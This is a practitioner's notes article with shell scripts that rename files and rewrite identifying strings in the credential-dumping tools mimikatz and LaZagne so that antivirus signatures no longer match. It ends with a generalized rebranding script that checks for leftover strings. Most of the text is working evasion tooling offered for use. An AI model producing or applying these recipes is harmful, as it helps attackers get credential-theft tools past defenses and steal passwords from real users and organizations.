On AV evasion for mimikatz and LaZagne


Antivirus engines still largely play the same old game: static signatures keyed on a handful of characteristic strings (project name, author, banner text, command names). Swap those strings in the source and rebuild, and the binary no longer matches; at the time these notes were written the latest Defender could be bypassed this way. Be clear about what that buys you: the rebuilt tool still opens LSASS or walks the same credential stores exactly as before, so behavioural and memory-based detection are unaffected, and the specific string set below decays as signatures are updated. Re-test against a current engine before relying on it.

The article is copied straight from my notes; if you need it, use it as your situation warrants.

git clone https://github.com/gentilkiwi/mimikatz.git lmmg
mv lmmg/mimikatz lmmg/lmmg

# Rename the files whose names carry the project name (the only directory that
# did, mimikatz/, was moved above). .git/ is left alone throughout.
find lmmg/ -name .git -prune -o -type f -name '*mimikatz*' -print | while read -r FILE ; do
        newfile="$(printf '%s\n' "${FILE}" | sed -e 's/mimikatz/windows/g')";
        mv "${FILE}" "${newfile}";
done
find lmmg/ -name .git -prune -o -type f -name '*kiwi*' -print | while read -r FILE ; do
        newfile="$(printf '%s\n' "${FILE}" | sed -e 's/kiwi/onedrive/g')";
        mv "${FILE}" "${newfile}";
done

# Replace the strings inside the sources. Only text files that actually contain
# the pattern are touched: grep -I skips binaries (the prebuilt .lib and .ico
# files), which sed -i would otherwise corrupt, and .git/ is pruned so the
# repository metadata is not rewritten. Order matters: the e-mail address goes
# before 'gentilkiwi', and 'gentilkiwi' before the bare kiwi/Kiwi/KIWI passes,
# or the broader pattern eats the narrower one first. DumpCreds/logonPasswords
# are command names, so after this the verbs are DumpCred and logonPassword.
sub() {
        find lmmg/ -name .git -prune -o -type f -print0 \
        | xargs -0 grep -IlZ -- "$1" \
        | xargs -0 -r sed -i "s/$1/$2/g"
}
sub mimikatz windows
sub MIMIKATZ WINDOWS
sub Mimikatz Windows
sub DELPY gweep
sub Benjamin gweeperx
sub benjamin@gentilkiwi.com @gweeperx
sub creativecommons notcommons
sub gentilkiwi MSOffice
sub KIWI ONEDRIVE
sub Kiwi Onedrive
sub kiwi onedrive
sub DumpCreds DumpCred
sub logonPasswords logonPassword
sub ArgumentPtr NotTodayPal
sub CallDllMainSC1 ThisIsNotTheStringYouAreLookingFor

cd ./lmmg/lmmg/
# Wrap one preprocessor block of windows.c (formerly mimikatz.c) in a C comment.
# The first command prefixes '/*' to the SECOND '#if !defined(_POWERKATZ)' in
# the file, the second appends '*/' after the THIRD '#endif'; the nested
# '0,/re/!' ranges are how sed is made to count occurrences. Presumably this is
# the block that prints the ASCII banner. The pairing depends on the layout of
# that file at the commit you cloned, so open windows.c afterwards and confirm
# the comment encloses exactly one block before building. \r\n keeps the file's
# CRLF line endings. Single quotes keep '!' away from shell history expansion.
sed -i '0,/#if !defined(_POWERKATZ)/! {0,/#if !defined(_POWERKATZ)/ s/#if !defined(_POWERKATZ)/\/*\r\n#if !defined(_POWERKATZ)/}' windows.c
sed -i '0,/#endif/! {0,/#endif/! {0,/#endif/ s/#endif/#endif\r\n*\//}}' windows.c

LaZagne
# Run from the root of a LaZagne checkout; only the Windows/ tree is rewritten.
# Three spellings occur in the tree (the lazagne package, laZagne.py, LaZagne
# in strings) and each gets its own mapping, so the renamed package directory
# and the 'from lazagne...' imports inside the sources stay consistent.
# Paths are renamed by basename, deepest first (-depth), so renaming the
# package directory cannot invalidate a path still waiting in the list.
rename_paths() {
        find ./Windows/ -depth -name "*$1*" -print | while read -r FILE ; do
                mv "${FILE}" "$(dirname "${FILE}")/$(basename "${FILE}" | sed -e "s/$1/$2/g")";
        done
}
rename_paths lazagne kmm
rename_paths LaZagne Kmm
rename_paths laZagne KMm

# Same substitution helper as for mimikatz, rooted at ./Windows/. Text files
# only; .pyc and other binaries are skipped by grep -I.
sub() {
        find ./Windows/ -type f -print0 \
        | xargs -0 grep -IlZ -- "$1" \
        | xargs -0 -r sed -i "s/$1/$2/g"
}
sub lazagne kmm
sub LaZagne Kmm
sub laZagne KMm

# Banner and status strings that appear in LaZagne's console output.
sub BANG bg
sub 'passwords ---------------' vp
sub 'Password not found' nop
sub '=================================================================' ll
sub '########## User' lp
sub 'For more information launch it again with the -v option' jj
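Both recipes above do the same two things by hand: rename paths that carry the project name, then rewrite the strings inside the sources. The script below is an added example, not code from the original notes or from either project. It folds the two steps into one reusable helper per (FROM, TO) pair, does the renames deepest first, never touches .git/ or binary files, and adds the check a practitioner wants before building: a count of text files that still contain the old string. It assumes GNU find/grep/sed (Linux) and runs against a constructed sample tree that stands in for a fresh clone.

```shell
#!/usr/bin/env bash
# Added example, not code from the original notes or from either project.
# Generalises the two recipes above for one (FROM, TO) pair. Assumes GNU
# find/grep/sed. FROM and TO are used as a basic-regex pattern and a sed
# replacement, so keep them free of / & and regex metacharacters, as the
# strings in the notes are.
set -eu

# replace_contents DIR FROM TO: sed FROM->TO in every text file under DIR that
# contains it. Skips .git/ and binary files (grep -I), which sed -i would corrupt.
replace_contents() {
    dir=$1 from=$2 to=$3
    find "$dir" -name .git -prune -o -type f -print0 \
    | xargs -0 grep -IlZ -- "$from" \
    | xargs -0 -r sed -i "s/${from}/${to}/g"
}

# rename_paths DIR FROM TO: rename every file or directory under DIR whose
# basename contains FROM. -depth lists children before parents, so a renamed
# directory never breaks the path of an entry still waiting in the list.
rename_paths() {
    dir=$1 from=$2 to=$3
    find "$dir" -depth ! -name .git ! -path '*/.git/*' -name "*${from}*" -print \
    | while IFS= read -r path; do
        newbase=$(basename "$path" | sed "s/${from}/${to}/g")
        mv "$path" "$(dirname "$path")/$newbase"
    done
}

# leftover_count DIR FROM: number of text files (outside .git/) that still
# mention FROM. Run it after each pass; the rebrand is done when it prints 0.
leftover_count() {
    dir=$1 from=$2
    find "$dir" -name .git -prune -o -type f -print0 \
    | xargs -0 grep -Il -- "$from" | wc -l | tr -d ' '
}

# rebrand DIR FROM TO: contents first (paths are still stable), then paths.
rebrand() {
    replace_contents "$1" "$2" "$3"
    rename_paths "$1" "$2" "$3"
}

# make_sample_tree: a constructed stand-in for a fresh clone (not the real
# repository): two sources, a .git/config that must stay untouched, and a
# binary blob that contains the string but must not be edited. Prints the root.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/mimikatz/modules" "$root/.git"
    printf 'int mimikatz_main(void) { return 0; }\n' > "$root/mimikatz/mimikatz.c"
    printf '#define MIMIKATZ_FULL "mimikatz 2.2.0"\n' > "$root/mimikatz/modules/globals.h"
    printf 'url = https://github.com/gentilkiwi/mimikatz.git\n' > "$root/.git/config"
    printf 'mimikatz\000\001\002' > "$root/mimikatz/icon.bin"
    printf '%s\n' "$root"
}

main() {
    root=$(make_sample_tree)
    echo "before: $(leftover_count "$root" mimikatz) text file(s) still mention mimikatz"
    rebrand "$root" mimikatz windows
    echo "after:  $(leftover_count "$root" mimikatz) text file(s) still mention mimikatz"
    # The upper-case MIMIKATZ_FULL survives: every case variant needs its own
    # pass, which is why the notes run three passes per name.
    grep -rI MIMIKATZ "$root" --exclude-dir=.git || true
    rm -rf "$root"
}
main "$@"
```

Call `rebrand lmmg mimikatz windows` (and so on for each pair in the notes) on a real clone and then `leftover_count lmmg mimikatz` for each pattern; anything non-zero is a file the static signature can still key on. The binary blob in the sample is the reason for `grep -I`: a plain `find | xargs sed -i` would rewrite it byte-for-byte and break the build.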

 

